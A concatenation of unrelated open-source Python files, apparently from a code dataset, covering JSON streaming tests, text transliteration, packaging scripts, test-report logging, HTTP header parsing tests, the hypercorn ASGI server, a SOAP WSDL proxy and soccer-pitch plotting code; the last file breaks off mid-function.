def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
a.iterwrite(range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5))
def test_mixed(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
a.iterwrite(range(5))
a.write('a')
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5)) + ['a']
def test_pretty_multiple(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5))
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
0,
1,
2,
3,
4
]""")
def test_pretty_one(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(1))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(1))
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
0
]""")
def test_pretty_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(5))
with a.subobject() as b:
b.iterwrite((str(i), i) for i in range(2))
expected = list(range(5))
expected.append({str(i): i for i in range(2)})
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
def test_pretty_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(5))
with a.subarray() as b:
b.iterwrite(range(2))
expected = list(range(5))
expected.append(list(range(2)))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
``` |
{
"source": "JonoYang/normality",
"score": 4
} |
#### File: normality/normality/transliteration.py
```python
import warnings
from typing import Optional
from normality.cleaning import compose_nfkc, is_text
# Transform to latin, separate accents, decompose, remove
# symbols, compose, push to ASCII
ASCII_SCRIPT = 'Any-Latin; NFKD; [:Symbol:] Remove; [:Nonspacing Mark:] Remove; NFKC; Accents-Any; Latin-ASCII' # noqa
class ICUWarning(UnicodeWarning):
pass
def latinize_text(text: Optional[str], ascii=False) -> Optional[str]:
"""Transliterate the given text to the latin script.
This attempts to convert a given text to latin script using the
closest match of characters vis a vis the original script.
"""
if text is None or not is_text(text) or not len(text):
return text
if ascii:
if not hasattr(latinize_text, '_ascii'):
latinize_text._ascii = make_trans(ASCII_SCRIPT) # type: ignore
return latinize_text._ascii(text) # type: ignore
if not hasattr(latinize_text, '_tr'):
latinize_text._tr = make_trans('Any-Latin') # type: ignore
return latinize_text._tr(text) # type: ignore
def ascii_text(text: Optional[str]) -> Optional[str]:
"""Transliterate the given text and make sure it ends up as ASCII."""
text = latinize_text(text, ascii=True)
if text is None or not is_text(text):
return None
return text.encode('ascii', 'ignore').decode('ascii')
def make_trans(script):
try:
from icu import Transliterator # type: ignore
inst = Transliterator.createInstance(script)
return inst.transliterate
except ImportError:
from text_unidecode import unidecode # type: ignore
warnings.warn("Install 'pyicu' for better text transliteration.", ICUWarning, stacklevel=4) # noqa
def transliterate(text):
text = compose_nfkc(text)
return unidecode(text)
return transliterate
``` |
{
"source": "JonoYang/wordle-helper",
"score": 2
} |
#### File: etc/scripts/gen_requirements.py
```python
import argparse
import pathlib
import utils_requirements
"""
Utilities to manage requirements files.
NOTE: this should use ONLY the standard library and not import anything else
because this is used for boostrapping with no requirements installed.
"""
def gen_requirements():
description = """
Create or replace the `--requirements-file` file FILE requirements file with all
locally installed Python packages.all Python packages found installed in `--site-packages-dir`
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-s",
"--site-packages-dir",
dest="site_packages_dir",
type=pathlib.Path,
required=True,
metavar="DIR",
help="Path to the 'site-packages' directory where wheels are installed such as lib/python3.6/site-packages",
)
parser.add_argument(
"-r",
"--requirements-file",
type=pathlib.Path,
metavar="FILE",
default="requirements.txt",
help="Path to the requirements file to update or create.",
)
args = parser.parse_args()
utils_requirements.lock_requirements(
site_packages_dir=args.site_packages_dir,
requirements_file=args.requirements_file,
)
if __name__ == "__main__":
gen_requirements()
```
#### File: etc/scripts/test_utils_pypi_supported_tags.py
```python
import pytest
from utils_pypi_supported_tags import validate_platforms_for_pypi
"""
Wheel platform checking tests
Copied and modified on 2020-12-24 from
https://github.com/pypa/warehouse/blob/37a83dd342d9e3b3ab4f6bde47ca30e6883e2c4d/tests/unit/forklift/test_legacy.py
"""
def validate_wheel_filename_for_pypi(filename):
"""
Validate if the filename is a PyPI/warehouse-uploadable wheel file name
with supported platform tags. Return a list of unsupported platform tags or
an empty list if all tags are supported.
"""
from utils_thirdparty import Wheel
wheel = Wheel.from_filename(filename)
return validate_platforms_for_pypi(wheel.platforms)
@pytest.mark.parametrize(
"plat",
[
"any",
"win32",
"win_amd64",
"win_ia64",
"manylinux1_i686",
"manylinux1_x86_64",
"manylinux2010_i686",
"manylinux2010_x86_64",
"manylinux2014_i686",
"manylinux2014_x86_64",
"manylinux2014_aarch64",
"manylinux2014_armv7l",
"manylinux2014_ppc64",
"manylinux2014_ppc64le",
"manylinux2014_s390x",
"manylinux_2_5_i686",
"manylinux_2_12_x86_64",
"manylinux_2_17_aarch64",
"manylinux_2_17_armv7l",
"manylinux_2_17_ppc64",
"manylinux_2_17_ppc64le",
"manylinux_3_0_s390x",
"macosx_10_6_intel",
"macosx_10_13_x86_64",
"macosx_11_0_x86_64",
"macosx_10_15_arm64",
"macosx_11_10_universal2",
# A real tag used by e.g. some numpy wheels
(
"macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64."
"macosx_10_10_intel.macosx_10_10_x86_64"
),
],
)
def test_is_valid_pypi_wheel_return_true_for_supported_wheel(plat):
filename = f"foo-1.2.3-cp34-none-{plat}.whl"
assert not validate_wheel_filename_for_pypi(filename)
@pytest.mark.parametrize(
"plat",
[
"linux_x86_64",
"linux_x86_64.win32",
"macosx_9_2_x86_64",
"macosx_12_2_arm64",
"macosx_10_15_amd64",
],
)
def test_is_valid_pypi_wheel_raise_exception_for_aunsupported_wheel(plat):
filename = f"foo-1.2.3-cp34-none-{plat}.whl"
invalid = validate_wheel_filename_for_pypi(filename)
assert invalid
``` |
{
"source": "jonozzz/allure-python",
"score": 2
} |
#### File: allure-python-commons/src/logger.py
```python
import io
import os
import sys
import json
import uuid
import shutil
from six import text_type
from attr import asdict
from allure_commons import hookimpl
INDENT = 4
class AllureFileLogger(object):
def __init__(self, report_dir, clean=False):
self._report_dir = report_dir
if not os.path.exists(report_dir):
os.makedirs(report_dir)
elif clean:
for f in os.listdir(report_dir):
f = os.path.join(report_dir, f)
if os.path.isfile(f):
os.unlink(f)
def _report_item(self, item):
indent = INDENT if os.environ.get("ALLURE_INDENT_OUTPUT") else None
filename = item.file_pattern.format(prefix=uuid.uuid4())
data = asdict(item, filter=lambda attr, value: not (type(value) != bool and not bool(value)))
with io.open(os.path.join(self._report_dir, filename), 'w', encoding='utf8') as json_file:
if sys.version_info.major < 3:
json_file.write(unicode(json.dumps(data, indent=indent, ensure_ascii=False, encoding='utf8')))
else:
json.dump(data, json_file, indent=indent, ensure_ascii=False)
@hookimpl
def report_result(self, result):
self._report_item(result)
@hookimpl
def report_container(self, container):
self._report_item(container)
@hookimpl
def report_attached_file(self, source, file_name):
destination = os.path.join(self._report_dir, file_name)
shutil.copy2(source, destination)
@hookimpl
def report_attached_data(self, body, file_name):
destination = os.path.join(self._report_dir, file_name)
with open(destination, 'wb') as attached_file:
if isinstance(body, text_type):
attached_file.write(body.encode('utf-8'))
else:
attached_file.write(body)
@hookimpl
def store_environment(self, env):
filename = 'environment.properties'
with io.open(os.path.join(self._report_dir, filename), 'w', encoding='utf8') as file:
file.writelines([u"{0}={1}\n".format(*x) for x in env.items()])
``` |
{
"source": "jonozzz/http-parser",
"score": 3
} |
#### File: http-parser/testing/test_headers.py
```python
import pytest
import io
from http_parser.http import HttpStream
from http_parser.pyparser import HttpParser as PyHttpParser
def test_continuation_header():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\n\r\n')
hdr = HttpStream(stream).headers()
assert hdr['X-Test'] == 'foo bar'
def test_repeated_header():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\nX-Test: bar\r\n\r\n')
hdr = HttpStream(stream).headers()
assert hdr['X-Test'] == 'foo, bar'
def test_repeated_continuation_header():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\nX-Test: baz\r\n qux\r\n\r\n')
hdr = HttpStream(stream).headers()
assert hdr['X-Test'] == 'foo bar, baz qux'
def test_continuation_header_py():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\n\r\n')
hdr = HttpStream(stream, parser_class=PyHttpParser).headers()
assert hdr['X-Test'] == 'foo bar'
def test_repeated_header_py():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\nX-Test: bar\r\n\r\n')
hdr = HttpStream(stream, parser_class=PyHttpParser).headers()
assert hdr['X-Test'] == 'foo, bar'
def test_repeated_continuation_header_py():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\nX-Test: baz\r\n qux\r\n\r\n')
hdr = HttpStream(stream, parser_class=PyHttpParser).headers()
assert hdr['X-Test'] == 'foo bar, baz qux'
``` |
{
"source": "jonozzz/hypercorn",
"score": 3
} |
#### File: compliance/h2spec/server.py
```python
import ssl
from hypercorn.config import Config
from hypercorn import run_single
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
while True:
event = await receive()
if event['type'] == 'http.disconnect':
break
elif event['type'] == 'http.request' and not event.get('more_body', False):
await self.send_data(send)
break
elif event['type'] == 'lifespan.startup':
await send({'type': 'lifespan.startup.complete'})
elif event['type'] == 'lifespan.shutdown':
await send({'type': 'lifespan.shutdown.complete'})
break
async def send_data(self, send):
await send({
'type': 'http.response.start',
'status': 200,
'headers': [(b'content-length', b'5')],
})
await send({
'type': 'http.response.body',
'body': b'Hello',
'more_body': False,
})
```
#### File: hypercorn/hypercorn/logging.py
```python
import logging
import os
import sys
import time
from typing import Any, Optional, Union
class AccessLogger:
def __init__(self, log_format: str, target: Union[logging.Logger, str, None]) -> None:
self.logger: Optional[logging.Logger] = None
self.log_format = log_format
if isinstance(target, logging.Logger):
self.logger = target
elif target is not None:
self.logger = logging.getLogger("hypercorn.access")
self.logger.handlers = []
if target == "-":
self.logger.addHandler(logging.StreamHandler(sys.stdout))
else:
self.logger.addHandler(logging.FileHandler(target))
self.logger.setLevel(logging.INFO)
def access(self, request: dict, response: dict, request_time: float) -> None:
if self.logger is not None:
self.logger.info(self.log_format, AccessLogAtoms(request, response, request_time))
def __getattr__(self, name: str) -> Any:
if self.logger is None:
return lambda *_: None
else:
return getattr(self.logger, name)
class AccessLogAtoms(dict):
def __init__(self, request: dict, response: dict, request_time: float) -> None:
for name, value in request["headers"]:
self[f"{{{name.decode().lower()}}}i"] = value.decode()
for name, value in response["headers"]:
self[f"{{{name.decode().lower()}}}o"] = value.decode()
for name, value in os.environ.items():
self[f"{{{name.lower()}}}e"] = value
protocol = request.get("http_version", "ws")
client = request.get("client")
if client is None:
remote_addr = None
elif len(client) == 2:
remote_addr = f"{client[0]}:{client[1]}"
elif len(client) == 1:
remote_addr = client[0]
else: # make sure not to throw UnboundLocalError
remote_addr = f"<???{client}???>"
method = request.get("method", "GET")
self.update(
{
"h": remote_addr,
"l": "-",
"t": time.strftime("[%d/%b/%Y:%H:%M:%S %z]"),
"r": f"{method} {request['path']} {protocol}",
"s": response["status"],
"m": method,
"U": request["path"],
"q": request["query_string"].decode(),
"H": protocol,
"b": self["{Content-Length}o"],
"B": self["{Content-Length}o"],
"f": self["{Referer}i"],
"a": self["{User-Agent}i"],
"T": int(request_time),
"D": int(request_time * 1_000_000),
"L": f"{request_time:.6f}",
"p": f"<{os.getpid()}>",
}
)
def __getitem__(self, key: str) -> str:
try:
if key.startswith("{"):
return super().__getitem__(key.lower())
else:
return super().__getitem__(key)
except KeyError:
return "-"
```
#### File: hypercorn/trio/lifespan.py
```python
from typing import Type
import trio
from ..config import Config
from ..typing import ASGIFramework
class UnexpectedMessage(Exception):
pass
class Lifespan:
def __init__(self, app: Type[ASGIFramework], config: Config) -> None:
self.app = app
self.config = config
self.startup = trio.Event()
self.shutdown = trio.Event()
self.app_send_channel, self.app_receive_channel = trio.open_memory_channel(10)
self.supported = True
async def handle_lifespan(
self, *, task_status: trio._core._run._TaskStatus = trio.TASK_STATUS_IGNORED
) -> None:
task_status.started()
scope = {"type": "lifespan"}
try:
asgi_instance = self.app(scope)
except Exception:
self.supported = False
if self.config.error_logger is not None:
self.config.error_logger.warning(
"ASGI Framework Lifespan error, continuing without Lifespan support"
)
else:
try:
await asgi_instance(self.asgi_receive, self.asgi_send)
except Exception:
if self.config.error_logger is not None:
self.config.error_logger.exception("Error in ASGI Framework")
finally:
await self.app_send_channel.aclose()
await self.app_receive_channel.aclose()
async def wait_for_startup(self) -> None:
if not self.supported:
return
await self.app_send_channel.send({"type": "lifespan.startup"})
with trio.fail_after(self.config.startup_timeout):
await self.startup.wait()
async def wait_for_shutdown(self) -> None:
if not self.supported:
return
await self.app_send_channel.send({"type": "lifespan.shutdown"})
with trio.fail_after(self.config.shutdown_timeout):
await self.shutdown.wait()
async def asgi_receive(self) -> dict:
return await self.app_receive_channel.receive()
async def asgi_send(self, message: dict) -> None:
if message["type"] == "lifespan.startup.complete":
self.startup.set()
elif message["type"] == "lifespan.shutdown.complete":
self.shutdown.set()
else:
raise UnexpectedMessage(message["type"])
```
#### File: hypercorn/hypercorn/utils.py
```python
import os
import platform
import socket
import sys
from importlib import import_module
from multiprocessing.synchronize import Event as EventType
from pathlib import Path
from time import time
from types import ModuleType
from typing import Any, Awaitable, Callable, Dict, List, Optional, Tuple, Type
from wsgiref.handlers import format_date_time
from .typing import ASGIFramework
class Shutdown(Exception):
pass
class MustReloadException(Exception):
pass
class NoAppException(Exception):
pass
def suppress_body(method: str, status_code: int) -> bool:
return method == "HEAD" or 100 <= status_code < 200 or status_code in {204, 304, 412}
def response_headers(protocol: str) -> List[Tuple[bytes, bytes]]:
return [
(b"date", format_date_time(time()).encode("ascii")),
(b"server", f"hypercorn-{protocol}".encode("ascii")),
]
def load_application(path: str) -> Type[ASGIFramework]:
try:
module_name, app_name = path.split(":", 1)
except ValueError:
module_name, app_name = path, "app"
except AttributeError:
raise NoAppException()
module_path = Path(module_name).resolve()
sys.path.insert(0, str(module_path.parent))
if module_path.is_file():
import_name = module_path.with_suffix("").name
else:
import_name = module_path.name
try:
module = import_module(import_name)
except ModuleNotFoundError as error:
if error.name == import_name: # type: ignore
raise NoAppException()
else:
raise
try:
return eval(app_name, vars(module))
except NameError:
raise NoAppException()
async def observe_changes(sleep: Callable[[float], Awaitable[Any]]) -> None:
last_updates: Dict[ModuleType, float] = {}
while True:
for module in list(sys.modules.values()):
filename = getattr(module, "__file__", None)
if filename is None:
continue
try:
mtime = Path(filename).stat().st_mtime
except FileNotFoundError:
continue
else:
if mtime > last_updates.get(module, mtime):
raise MustReloadException()
last_updates[module] = mtime
await sleep(1)
def restart() -> None:
# Restart this process (only safe for dev/debug)
executable = sys.executable
script_path = Path(sys.argv[0]).resolve()
args = sys.argv[1:]
main_package = sys.modules["__main__"].__package__
if main_package is None:
# Executed by filename
if platform.system() == "Windows":
if not script_path.exists() and script_path.with_suffix(".exe").exists():
# quart run
executable = str(script_path.with_suffix(".exe"))
else:
# python run.py
args.append(str(script_path))
else:
if script_path.is_file() and os.access(script_path, os.X_OK):
# hypercorn run:app --reload
executable = str(script_path)
else:
# python run.py
args.append(str(script_path))
else:
# Executed as a module e.g. python -m run
module = script_path.stem
import_name = main_package
if module != "__main__":
import_name = f"{main_package}.{module}"
args[:0] = ["-m", import_name.lstrip(".")]
os.execv(executable, [executable] + args)
async def check_shutdown(
shutdown_event: EventType, sleep: Callable[[float], Awaitable[Any]]
) -> None:
while True:
if shutdown_event.is_set():
raise Shutdown()
await sleep(0.1)
def write_pid_file(pid_path: str) -> None:
with open(pid_path, "w") as file_:
file_.write(f"{os.getpid()}")
def parse_socket_addr(family: int, address: tuple) -> Optional[Tuple[str, int]]:
if family == socket.AF_INET:
return address # type: ignore
elif family == socket.AF_INET6:
return (address[0], address[1])
else:
return None
```
#### File: tests/asyncio/helpers.py
```python
import asyncio
from socket import AF_INET
from typing import Tuple
class MockSocket:
family = AF_INET
def getsockname(self) -> Tuple[str, int]:
return ("172.16.17.32", 80)
def getpeername(self) -> Tuple[str, int]:
return ("127.0.0.1", 80)
class MockTransport:
def __init__(self) -> None:
self.data = bytearray()
self.closed = asyncio.Event()
self.updated = asyncio.Event()
def get_extra_info(self, name: str) -> MockSocket:
if name == "socket":
return MockSocket()
return None
def write(self, data: bytes) -> None:
assert not self.closed.is_set()
if data == b"":
return
self.data.extend(data)
self.updated.set()
def close(self) -> None:
self.updated.set()
self.closed.set()
def clear(self) -> None:
self.data = bytearray()
self.updated.clear()
```
#### File: hypercorn/tests/test_logging.py
```python
import logging
import os
import time
from typing import Optional, Type, Union
import pytest
from hypercorn.logging import AccessLogAtoms, AccessLogger
@pytest.mark.parametrize(
"target, expected_name, expected_handler_type",
[
("-", "hypercorn.access", logging.StreamHandler),
("/tmp/path", "hypercorn.access", logging.FileHandler),
(logging.getLogger("test_special"), "test_special", None),
(None, None, None),
],
)
def test_access_logger_init(
target: Union[logging.Logger, str, None],
expected_name: Optional[str],
expected_handler_type: Optional[Type[logging.Handler]],
) -> None:
access_logger = AccessLogger("%h", target)
assert access_logger.log_format == "%h"
if expected_name is None:
assert access_logger.logger is None
else:
assert access_logger.logger.name == expected_name
if expected_handler_type is None:
assert access_logger.handlers == []
else:
assert isinstance(access_logger.handlers[0], expected_handler_type)
@pytest.fixture(name="request_scope")
def _request_scope() -> dict:
return {
"type": "http",
"http_version": "2",
"method": "GET",
"scheme": "https",
"path": "/",
"query_string": b"a=b",
"root_path": "",
"headers": [
(b"User-Agent", b"Hypercorn"),
(b"X-Hypercorn", b"Hypercorn"),
(b"Referer", b"hypercorn"),
],
"client": ("127.0.0.1",),
"server": None,
}
@pytest.fixture(name="response")
def _response_scope() -> dict:
return {"status": 200, "headers": [(b"Content-Length", b"5"), (b"X-Hypercorn", b"Hypercorn")]}
def test_access_log_standard_atoms(request_scope: dict, response: dict) -> None:
atoms = AccessLogAtoms(request_scope, response, 0.000_023)
assert atoms["h"] == "127.0.0.1"
assert atoms["l"] == "-"
assert time.strptime(atoms["t"], "[%d/%b/%Y:%H:%M:%S %z]")
assert int(atoms["s"]) == 200
assert atoms["m"] == "GET"
assert atoms["U"] == "/"
assert atoms["q"] == "a=b"
assert atoms["H"] == "2"
assert int(atoms["b"]) == 5
assert int(atoms["B"]) == 5
assert atoms["f"] == "hypercorn"
assert atoms["a"] == "Hypercorn"
assert atoms["p"] == f"<{os.getpid()}>"
assert atoms["not-atom"] == "-"
assert atoms["T"] == 0
assert atoms["D"] == 23
assert atoms["L"] == "0.000023"
def test_access_log_header_atoms(request_scope: dict, response: dict) -> None:
atoms = AccessLogAtoms(request_scope, response, 0)
assert atoms["{X-Hypercorn}i"] == "Hypercorn"
assert atoms["{X-HYPERCORN}i"] == "Hypercorn"
assert atoms["{not-atom}i"] == "-"
assert atoms["{X-Hypercorn}o"] == "Hypercorn"
assert atoms["{X-HYPERCORN}o"] == "Hypercorn"
def test_access_log_environ_atoms(request_scope: dict, response: dict) -> None:
os.environ["Random"] = "Environ"
atoms = AccessLogAtoms(request_scope, response, 0)
assert atoms["{random}e"] == "Environ"
``` |
{
"source": "jonozzz/SOAPpy",
"score": 3
} |
#### File: src/SOAPpy/WSDL.py
```python
ident = '$Id: WSDL.py 1467 2008-05-16 23:32:51Z warnes $'
from version import __version__
import wstools
import xml
from Errors import Error
from Client import SOAPProxy, SOAPAddress
from Config import Config
import urllib
class Proxy:
"""WSDL Proxy.
SOAPProxy wrapper that parses method names, namespaces, soap actions from
the web service description language (WSDL) file passed into the
constructor. The WSDL reference can be passed in as a stream, an url, a
file name, or a string.
Loads info into self.methods, a dictionary with methodname keys and values
of WSDLTools.SOAPCallinfo.
For example,
url = 'http://www.xmethods.org/sd/2001/TemperatureService.wsdl'
wsdl = WSDL.Proxy(url)
print len(wsdl.methods) # 1
print wsdl.methods.keys() # getTemp
See WSDLTools.SOAPCallinfo for more info on each method's attributes.
"""
def __init__(self, wsdlsource, config=Config, **kw ):
reader = wstools.WSDLTools.WSDLReader()
self.wsdl = None
# From <NAME>'s "Dive Into Python" toolkit.py--open anything.
if self.wsdl is None and hasattr(wsdlsource, "read"):
print 'stream:', wsdlsource
try:
self.wsdl = reader.loadFromStream(wsdlsource)
except xml.parsers.expat.ExpatError, e:
newstream = urllib.URLopener(key_file=config.SSL.key_file, cert_file=config.SSL.cert_file).open(wsdlsource)
buf = newstream.readlines()
raise Error, "Unable to parse WSDL file at %s: \n\t%s" % \
(wsdlsource, "\t".join(buf))
# NOT TESTED (as of April 17, 2003)
#if self.wsdl is None and wsdlsource == '-':
# import sys
# self.wsdl = reader.loadFromStream(sys.stdin)
# print 'stdin'
if self.wsdl is None:
try:
file(wsdlsource)
self.wsdl = reader.loadFromFile(wsdlsource)
#print 'file'
except (IOError, OSError): pass
except xml.parsers.expat.ExpatError, e:
newstream = urllib.urlopen(wsdlsource)
buf = newstream.readlines()
raise Error, "Unable to parse WSDL file at %s: \n\t%s" % \
(wsdlsource, "\t".join(buf))
if self.wsdl is None:
try:
stream = urllib.URLopener(key_file=config.SSL.key_file, cert_file=config.SSL.cert_file).open(wsdlsource)
self.wsdl = reader.loadFromStream(stream, wsdlsource)
except (IOError, OSError): pass
except xml.parsers.expat.ExpatError, e:
newstream = urllib.urlopen(wsdlsource)
buf = newstream.readlines()
raise Error, "Unable to parse WSDL file at %s: \n\t%s" % \
(wsdlsource, "\t".join(buf))
if self.wsdl is None:
import StringIO
self.wsdl = reader.loadFromString(str(wsdlsource))
#print 'string'
# Package wsdl info as a dictionary of remote methods, with method name
# as key (based on ServiceProxy.__init__ in ZSI library).
self.methods = {}
service = self.wsdl.services[0]
port = service.ports[0]
name = service.name
binding = port.getBinding()
portType = binding.getPortType()
for operation in portType.operations:
callinfo = wstools.WSDLTools.callInfoFromWSDL(port, operation.name)
self.methods[callinfo.methodName] = callinfo
self.soapproxy = SOAPProxy('http://localhost/dummy.webservice',
config=config, **kw)
def __str__(self):
s = ''
for method in self.methods.values():
s += str(method)
return s
def __getattr__(self, name):
"""Set up environment then let parent class handle call.
Raises AttributeError is method name is not found."""
if not self.methods.has_key(name): raise AttributeError, name
callinfo = self.methods[name]
self.soapproxy.proxy = SOAPAddress(callinfo.location)
self.soapproxy.namespace = callinfo.namespace
self.soapproxy.soapaction = callinfo.soapAction
return self.soapproxy.__getattr__(name)
def show_methods(self):
for key in self.methods.keys():
method = self.methods[key]
print "Method Name:", key.ljust(15)
print
inps = method.inparams
for parm in range(len(inps)):
details = inps[parm]
print " In #%d: %s (%s)" % (parm, details.name, details.type)
print
outps = method.outparams
for parm in range(len(outps)):
details = outps[parm]
print " Out #%d: %s (%s)" % (parm, details.name, details.type)
print
``` |
{
"source": "jonpalmisc/st-clang-format",
"score": 3
} |
#### File: jonpalmisc/st-clang-format/ClangFormat.py
```python
import sublime
import sublime_plugin
import subprocess
class ClangFormatCommand(sublime_plugin.TextCommand):
"""Format the current buffer."""
def run(self, edit: sublime.Edit, style: str):
command = ["clang-format", "-style", style, "-"]
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
global_region = sublime.Region(0, self.view.size())
buffer = self.view.substr(global_region)
result, error = process.communicate(buffer.encode("utf-8"))
if error:
sublime.error_message("Failed to format buffer.")
return
self.view.replace(edit, global_region, result.decode("utf-8"))
def input(self, _):
return StyleInputHandler()
class StyleInputHandler(sublime_plugin.ListInputHandler):
"""Input handler to choose format presets."""
def list_items(self):
return ["Default", "LLVM", "WebKit"]
``` |
{
"source": "jonpappalord/soccer_logs_exploration",
"score": 3
} |
#### File: jonpappalord/soccer_logs_exploration/plot_utils.py
```python
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
from matplotlib.ticker import FormatStrFormatter
import pandas as pd
import seaborn as sns
from collections import Counter
import numpy as np
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
import plotly.graph_objs as go
data_folder = 'data/'
tags_names_df = pd.read_csv(data_folder + 'tags2name.csv')
def pitch():
"""
code to plot a soccer pitch
"""
#create figure
fig,ax=plt.subplots(figsize=(7,5))
#Pitch Outline & Centre Line
plt.plot([0,0],[0,100], color="black")
plt.plot([0,100],[100,100], color="black")
plt.plot([100,100],[100,0], color="black")
plt.plot([100,0],[0,0], color="black")
plt.plot([50,50],[0,100], color="black")
#Left Penalty Area
plt.plot([16.5,16.5],[80,20],color="black")
plt.plot([0,16.5],[80,80],color="black")
plt.plot([16.5,0],[20,20],color="black")
#Right Penalty Area
plt.plot([83.5,100],[80,80],color="black")
plt.plot([83.5,83.5],[80,20],color="black")
plt.plot([83.5,100],[20,20],color="black")
#Left 6-yard Box
plt.plot([0,5.5],[65,65],color="black")
plt.plot([5.5,5.5],[65,35],color="black")
plt.plot([5.5,0.5],[35,35],color="black")
#Right 6-yard Box
plt.plot([100,94.5],[65,65],color="black")
plt.plot([94.5,94.5],[65,35],color="black")
plt.plot([94.5,100],[35,35],color="black")
#Prepare Circles
centreCircle = Ellipse((50, 50), width=30, height=39, edgecolor="black", facecolor="None", lw=1.8)
centreSpot = Ellipse((50, 50), width=1, height=1.5, edgecolor="black", facecolor="black", lw=1.8)
leftPenSpot = Ellipse((11, 50), width=1, height=1.5, edgecolor="black", facecolor="black", lw=1.8)
rightPenSpot = Ellipse((89, 50), width=1, height=1.5, edgecolor="black", facecolor="black", lw=1.8)
#Draw Circles
ax.add_patch(centreCircle)
ax.add_patch(centreSpot)
ax.add_patch(leftPenSpot)
ax.add_patch(rightPenSpot)
#limit axis
plt.xlim(0,100)
plt.ylim(0,100)
ax.annotate("", xy=(25, 5), xytext=(5, 5),
arrowprops=dict(arrowstyle="->", linewidth=2))
ax.text(7,7,'Attack',fontsize=20)
return fig,ax
def draw_pitch(pitch, line, orientation, view, alpha=1):
"""
Draw a soccer pitch given the pitch, the orientation, the view and the line
Parameters
----------
pitch
"""
orientation = orientation
view = view
line = line
pitch = pitch
if orientation.lower().startswith("h"):
if view.lower().startswith("h"):
fig,ax = plt.subplots(figsize=(6.8,10.4))
plt.xlim(49,105)
plt.ylim(-1,69)
else:
fig,ax = plt.subplots(figsize=(10.4,6.8))
plt.xlim(-1,105)
plt.ylim(-1,69)
ax.axis('off') # this hides the x and y ticks
# side and goal lines #
ly1 = [0,0,68,68,0]
lx1 = [0,104,104,0,0]
plt.plot(lx1,ly1,color=line,zorder=5)
# boxes, 6 yard box and goals
#outer boxes#
ly2 = [13.84,13.84,54.16,54.16]
lx2 = [104,87.5,87.5,104]
plt.plot(lx2,ly2,color=line,zorder=5)
ly3 = [13.84,13.84,54.16,54.16]
lx3 = [0,16.5,16.5,0]
plt.plot(lx3,ly3,color=line,zorder=5)
#goals#
ly4 = [30.34,30.34,37.66,37.66]
lx4 = [104,104.2,104.2,104]
plt.plot(lx4,ly4,color=line,zorder=5)
ly5 = [30.34,30.34,37.66,37.66]
lx5 = [0,-0.2,-0.2,0]
plt.plot(lx5,ly5,color=line,zorder=5)
#6 yard boxes#
ly6 = [24.84,24.84,43.16,43.16]
lx6 = [104,99.5,99.5,104]
plt.plot(lx6,ly6,color=line,zorder=5)
ly7 = [24.84,24.84,43.16,43.16]
lx7 = [0,4.5,4.5,0]
plt.plot(lx7,ly7,color=line,zorder=5)
#Halfway line, penalty spots, and kickoff spot
ly8 = [0,68]
lx8 = [52,52]
plt.plot(lx8,ly8,color=line,zorder=5)
plt.scatter(93,34,color=line,zorder=5)
plt.scatter(11,34,color=line,zorder=5)
plt.scatter(52,34,color=line,zorder=5)
circle1 = plt.Circle((93.5,34), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle2 = plt.Circle((10.5,34), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle3 = plt.Circle((52, 34), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=2,alpha=1)
## Rectangles in boxes
rec1 = plt.Rectangle((87.5,20), 16,30,ls='-',color=pitch, zorder=1,alpha=alpha)
rec2 = plt.Rectangle((0, 20), 16.5,30,ls='-',color=pitch, zorder=1,alpha=alpha)
## Pitch rectangle
rec3 = plt.Rectangle((-1, -1), 106,70,ls='-',color=pitch, zorder=1,alpha=alpha)
ax.add_artist(rec3)
ax.add_artist(circle1)
ax.add_artist(circle2)
ax.add_artist(rec1)
ax.add_artist(rec2)
ax.add_artist(circle3)
else:
if view.lower().startswith("h"):
fig,ax = plt.subplots(figsize=(10.4,6.8))
plt.ylim(49,105)
plt.xlim(-1,69)
else:
fig,ax = plt.subplots(figsize=(6.8,10.4))
plt.ylim(-1,105)
plt.xlim(-1,69)
ax.axis('off') # this hides the x and y ticks
# side and goal lines #
lx1 = [0,0,68,68,0]
ly1 = [0,104,104,0,0]
plt.plot(lx1,ly1,color=line,zorder=5)
# boxes, 6 yard box and goals
#outer boxes#
lx2 = [13.84,13.84,54.16,54.16]
ly2 = [104,87.5,87.5,104]
plt.plot(lx2,ly2,color=line,zorder=5)
lx3 = [13.84,13.84,54.16,54.16]
